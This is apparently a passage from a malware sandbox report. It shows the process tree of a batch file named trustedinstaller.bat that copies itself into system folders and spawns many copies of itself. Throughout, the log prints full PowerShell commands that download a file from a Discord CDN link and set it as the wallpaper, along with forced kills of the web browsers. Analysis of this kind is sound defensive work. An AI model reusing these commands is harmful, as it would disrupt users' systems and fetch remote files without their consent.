        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5992
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6288
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:5144
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7212
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:5448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6648
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:2704
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8084
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:5372
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:6676
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:6820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2652
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5272
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9816
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:9824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:9856
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:9864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:1732
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:684
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:492
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6856
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:3352
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:5328
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:2644
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:3904
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:9944
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:5324
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:4324
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:3204
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:6208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:4824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:2368
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:3508
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:3288
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:2968
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      Kills process with taskkill
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1784
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3776
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:5804
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4224
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6384
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:5844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Blocklisted process makes network request
        
        PID:1364
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:2540
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5108
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:2484
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:2128
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:5268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2428
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3696
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5820
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9456
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:9488
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9552
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9584
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:9608
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:9640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:2208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2292
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4560
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:8564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:8584
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:8596
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:8608
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:8616
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:8624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:8632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3272
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5428
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:1736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5796
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:4292
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7888
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:4816
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:3480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:4584
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:3748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7864
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:4760
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7932
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:1752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:1004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2084
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4892
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6288
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8196
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:6944
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
